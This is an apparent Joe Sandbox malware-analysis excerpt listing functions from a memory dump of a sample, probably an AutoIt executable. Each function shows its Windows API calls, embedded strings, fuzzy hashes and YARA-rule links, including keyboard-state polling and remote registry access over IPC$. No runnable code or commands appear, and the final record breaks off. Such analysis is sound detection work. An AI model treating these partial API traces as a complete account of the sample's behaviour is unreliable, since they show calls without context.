Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 6dc74b22f79efafb8a4f9ffe6a7d6f9ffa250d3711eb88decf8d38184f6ce6a7
Instruction ID: b87e2e719e36e4e27fc8b0a8bd514174d245e695e1d97cf24c30765ea96f7077
Opcode Fuzzy Hash: 6dc74b22f79efafb8a4f9ffe6a7d6f9ffa250d3711eb88decf8d38184f6ce6a7
Instruction Fuzzy Hash: 94918A742046019FCB14EF20C451AEEB7A5AF94354F108869F8965B3A3CB35FE4ACB92

Function 0009E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0009E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 0009E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0009E33B
__wsplitpath.LIBCMT ref: 0009E399
_wcscat.LIBCMT ref: 0009E3B1
_wcscat.LIBCMT ref: 0009E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0009E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0009E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 0009E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 0009E43F
_wcscpy.LIBCMT ref: 0009E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0009E48A

Strings

*.*, xrefs: 0009E445

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: e788cf253277ff05b4d4ed4b5cc9edc32cac1208b7fedcf7c39ba244f9576295
Instruction ID: dfa60ae0b4f9a57c22a6e7ea6bb41acdcf9aef16710ee862e2dc6bb99c5c86d8
Opcode Fuzzy Hash: e788cf253277ff05b4d4ed4b5cc9edc32cac1208b7fedcf7c39ba244f9576295
Instruction Fuzzy Hash: 976127725046459FCB10EF60D885A9FB3E8BF89314F04892EF98987252DB35EE45CB92

Function 0009A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0009A2C2

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0009A2E3
__swprintf.LIBCMT ref: 0009A33C
__swprintf.LIBCMT ref: 0009A355
_wprintf.LIBCMT ref: 0009A3FC
_wprintf.LIBCMT ref: 0009A41A

Strings

Line %d (File "%s"):, xrefs: 0009A336, 0009A34F
^ ERROR , xrefs: 0009A391
"%s" (%d) : ==> %s:, xrefs: 0009A415
"%s" (%d) : ==> %s:%s%s, xrefs: 0009A3F7
Error: , xrefs: 0009A3C4
Incorrect parameters to object property !, xrefs: 0009A39E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: e4daa7bef1aad00482e200e2f472eaab8a5d1dd6b86224684ea67be229d31ff3
Instruction ID: 34f338169cc3a22a4fcb8cbde0204fbc40caafa19d42b3fdea3234de82293747
Opcode Fuzzy Hash: e4daa7bef1aad00482e200e2f472eaab8a5d1dd6b86224684ea67be229d31ff3
Instruction Fuzzy Hash: 2D51B3B1900219BADF15EBE0CD46EEEB7B9AF08340F104165F505B2093EB352F98DBA1

Function 00090065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,0007F8B8,00000001,0000138C,00000001,00000001,00000001,?,000A3FF9,00000001), ref: 0009009A
LoadStringW.USER32(00000000,?,0007F8B8,00000001), ref: 000900A3

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

GetModuleHandleW.KERNEL32(00000000,000F7310,?,00000FFF,?,?,0007F8B8,00000001,0000138C,00000001,00000001,00000001,?,000A3FF9,00000001,00000001), ref: 000900C5
LoadStringW.USER32(00000000,?,0007F8B8,00000001), ref: 000900C8
__swprintf.LIBCMT ref: 00090118
__swprintf.LIBCMT ref: 00090129
_wprintf.LIBCMT ref: 000901D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000901E9

Strings

Line %d (File "%s"):, xrefs: 00090112
Line %d:, xrefs: 00090123
%s (%d) : ==> %s: %s %s, xrefs: 000901CD
^ ERROR, xrefs: 0009017E
Error: , xrefs: 000901A0

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: ff849639290aa9f439370b755f2d349468395dfda8ae1b9b98e020668663844e
Instruction ID: 03a774ac1bb35451fd6cce70b9d0130fefebcb4dfe75d0cc5a030da7d420a0d1
Opcode Fuzzy Hash: ff849639290aa9f439370b755f2d349468395dfda8ae1b9b98e020668663844e
Instruction Fuzzy Hash: 9F416FB290021DAACF14EBE0CD96DEEB778AF18340F500165F605B2093EB356F58DB65

Function 0009A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC

CharLowerBuffW.USER32(?,?), ref: 0009AA0E
GetDriveTypeW.KERNEL32 ref: 0009AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009AB08

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

Strings

closed, xrefs: 0009AA22, 0009AA2B
close, xrefs: 0009AA14
open, xrefs: 0009AA35
type cdaudio alias cd wait, xrefs: 0009AA86
open , xrefs: 0009AA6A
close cd wait, xrefs: 0009AAF3
wait, xrefs: 0009AAC5
set cd door , xrefs: 0009AAA9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 84b48353b31f0684e7c9266405866280204ab39c0b3b839390f3e451cbdc21a7
Instruction ID: 58ee20669f0070aee4be755c02b79f21f6e298f0c3e8b8a699217ca2aeeaf087
Opcode Fuzzy Hash: 84b48353b31f0684e7c9266405866280204ab39c0b3b839390f3e451cbdc21a7
Instruction Fuzzy Hash: 06515CB12043059FC700EF11D9819ABB7F8FF98758F10496DF895A7262DB31AE09CB92

Function 0009A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0009A852
__swprintf.LIBCMT ref: 0009A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 0009A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0009A8D6
_memset.LIBCMT ref: 0009A8F5
_wcsncpy.LIBCMT ref: 0009A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0009A966
CloseHandle.KERNEL32(00000000), ref: 0009A971
RemoveDirectoryW.KERNEL32(?), ref: 0009A97A
CloseHandle.KERNEL32(00000000), ref: 0009A984

Strings

\, xrefs: 0009A88A
:, xrefs: 0009A895
\??\%s, xrefs: 0009A86E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 881c1615257568a161452813073328ba4dc38488d833ef9bc545846ed232b36b
Instruction ID: bc8552a5a3b4c1420c9ca0d9b6489606b11edca2bdee0a235778198c93eb8863
Opcode Fuzzy Hash: 881c1615257568a161452813073328ba4dc38488d833ef9bc545846ed232b36b
Instruction Fuzzy Hash: B131C171A0021AABDB219FA4DC49FEB73BCEF8A700F1041A6F908D2160EB749744CB65

Function 000BC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,000B982C,?,?), ref: 000BC0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC0F7
GlobalLock.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC10F
GlobalUnlock.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC118
CloseHandle.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC130
OleLoadPicture.OLEAUT32(?,00000000,00000000,000C3C7C,?), ref: 000BC149
GlobalFree.KERNEL32(00000000), ref: 000BC159
GetObjectW.GDI32(00000000,00000018,?), ref: 000BC17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 000BC1A8
DeleteObject.GDI32(00000000), ref: 000BC1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000BC1E6

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 52d9fa2de8584602dbd503d9654dd5922f46cee43d784b43ee16d433b8231e7d
Instruction ID: 47093ae57d6f25e60bebc45b9b36babcff6c3df34524c92ca3fd645432b2a5f1
Opcode Fuzzy Hash: 52d9fa2de8584602dbd503d9654dd5922f46cee43d784b43ee16d433b8231e7d
Instruction Fuzzy Hash: 10412B75540205EFEB619FA5DC88EAEBBB8EF89711F108058FD06E7260DB349D41DB60

Function 000BC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000329E2: GetWindowLongW.USER32(?,000000EB), ref: 000329F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000BC8A4
GetFocus.USER32 ref: 000BC8B4
GetDlgCtrlID.USER32(00000000), ref: 000BC8BF
_memset.LIBCMT ref: 000BC9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000BCA15
GetMenuItemCount.USER32(?), ref: 000BCA35
GetMenuItemID.USER32(?,00000000), ref: 000BCA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000BCA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000BCAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000BCAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000BCB31

Strings

0, xrefs: 000BC9E2

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: a5a6b7aec73931edf6519ececb6376740047f18df93de307c71eaa24b6c08e7a
Instruction ID: bf89a9b478a9c25683b50c57ab3c110c7469e144871962716657b841ae1d9e1d
Opcode Fuzzy Hash: a5a6b7aec73931edf6519ececb6376740047f18df93de307c71eaa24b6c08e7a
Instruction Fuzzy Hash: 30817C702083459FE751DF14C985EAFBBE8FB88354F00492EF99997291C770D905CBA2

Function 00088ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00088E3C
Part of subcall function 00088E20: GetLastError.KERNEL32(?,00088900,?,?,?), ref: 00088E46
Part of subcall function 00088E20: GetProcessHeap.KERNEL32(00000008,?,?,00088900,?,?,?), ref: 00088E55
Part of subcall function 00088E20: HeapAlloc.KERNEL32(00000000,?,00088900,?,?,?), ref: 00088E5C
Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00088E73

Part of subcall function 00088EBD: GetProcessHeap.KERNEL32(00000008,00088916,00000000,00000000,?,00088916,?), ref: 00088EC9
Part of subcall function 00088EBD: HeapAlloc.KERNEL32(00000000,?,00088916,?), ref: 00088ED0
Part of subcall function 00088EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00088916,?), ref: 00088EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00088B2E
_memset.LIBCMT ref: 00088B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00088B62
GetLengthSid.ADVAPI32(?), ref: 00088B73
GetAce.ADVAPI32(?,00000000,?), ref: 00088BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00088BCC
GetLengthSid.ADVAPI32(?), ref: 00088BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00088BF8
HeapAlloc.KERNEL32(00000000), ref: 00088BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00088C20
CopySid.ADVAPI32(00000000), ref: 00088C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00088C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00088C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00088C92

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: bb22eb3ac5fa28ec8eee6e894ec4b75840c0ce56ece8b9559967fd2f1b1a510b
Instruction ID: d076ae6f5bc4fc7f4e06655321b45cef7814efb85822be1298fea1e6e773e2d9
Opcode Fuzzy Hash: bb22eb3ac5fa28ec8eee6e894ec4b75840c0ce56ece8b9559967fd2f1b1a510b
Instruction Fuzzy Hash: 6661547190020AEFDF10AFA4DC44EEEBBB9FF04300F54816AF955A6291DB359A15CB60

Function 0009A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0009A4D4

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 0009A4F6
__swprintf.LIBCMT ref: 0009A54F
__swprintf.LIBCMT ref: 0009A568
_wprintf.LIBCMT ref: 0009A61E
_wprintf.LIBCMT ref: 0009A63C

Strings

Line %d (File "%s"):, xrefs: 0009A549, 0009A562
"%s" (%d) : ==> %s:, xrefs: 0009A637
^ ERROR, xrefs: 0009A5C0
"%s" (%d) : ==> %s:%s%s, xrefs: 0009A619
Error: , xrefs: 0009A5E6

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 9ba02e8457d08f0f1b4c49fce719e5141017b20f9caa67d5deb6168ed96633f7
Instruction ID: 7dfe7dfba706def04d298e3f0eb774cef89013a229470c129cb3c97e104afcb9
Opcode Fuzzy Hash: 9ba02e8457d08f0f1b4c49fce719e5141017b20f9caa67d5deb6168ed96633f7
Instruction Fuzzy Hash: E351A1B1900109BBDF15EBE0CD46EEEB7B9AF09340F100165F505B21A2DB316F98DBA5

Function 000883FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

_memset.LIBCMT ref: 00088489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000884BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000884DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000884F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00088520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00088548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00088553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00088558

Strings

\IPC$, xrefs: 000884A0
SOFTWARE\Classes\, xrefs: 0008842A
\CLSID, xrefs: 00088440

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 738c8450fc9ab7a2e3604092152a3efc90163e5afad1c701a62e4a770d14d3ca
Instruction ID: 34d41d96f6625d83912aa0298398d728ec17fdc26e2909a878ec5703e703577a
Opcode Fuzzy Hash: 738c8450fc9ab7a2e3604092152a3efc90163e5afad1c701a62e4a770d14d3ca
Instruction Fuzzy Hash: F54108B2C1022DABDF11EBA4DC95DEEB7B8FF08340F404129F945A2162EB355E44CB90

Function 0009081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00090896
SetKeyboardState.USER32(?), ref: 00090901
GetAsyncKeyState.USER32(000000A0), ref: 00090921
GetKeyState.USER32(000000A0), ref: 00090938
GetAsyncKeyState.USER32(000000A1), ref: 00090967
GetKeyState.USER32(000000A1), ref: 00090978
GetAsyncKeyState.USER32(00000011), ref: 000909A4
GetKeyState.USER32(00000011), ref: 000909B2
GetAsyncKeyState.USER32(00000012), ref: 000909DB
GetKeyState.USER32(00000012), ref: 000909E9
GetAsyncKeyState.USER32(0000005B), ref: 00090A12
GetKeyState.USER32(0000005B), ref: 00090A20

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ea7fbdd89ca2062d44f9d144e79b07d82bb4aa0950bcb6a0b6e0526c7447d5f9
Instruction ID: 2eba1ba0d0ea73ab0264c436ed22a16045ecce1c1a83912699ac04e84bb74425
Opcode Fuzzy Hash: ea7fbdd89ca2062d44f9d144e79b07d82bb4aa0950bcb6a0b6e0526c7447d5f9
Instruction Fuzzy Hash: 1651B630B087892DFF75DBA088107EBBFF49F01380F08859995C2571C3DA649A8CDBA2

Function 000323F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00031F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00032412,?,00000000,?,?,?,?,00031AA7,00000000,?), ref: 00031F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000324AF
KillTimer.USER32(-00000001,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0003254A
DestroyAcceleratorTable.USER32(00000000), ref: 0006BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0006C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0006C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0006C04B
DeleteObject.GDI32(00000000), ref: 0006C05D

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: bcd9d6487b4d73d53bd5d2c348a4cda4ea0961d2080e6b30e1cd5b203a693ab7
Instruction ID: 6eb10ce6de845777b2fa8a44189326bbc90a50f9843fcadeae8c8bba26e0f0c8
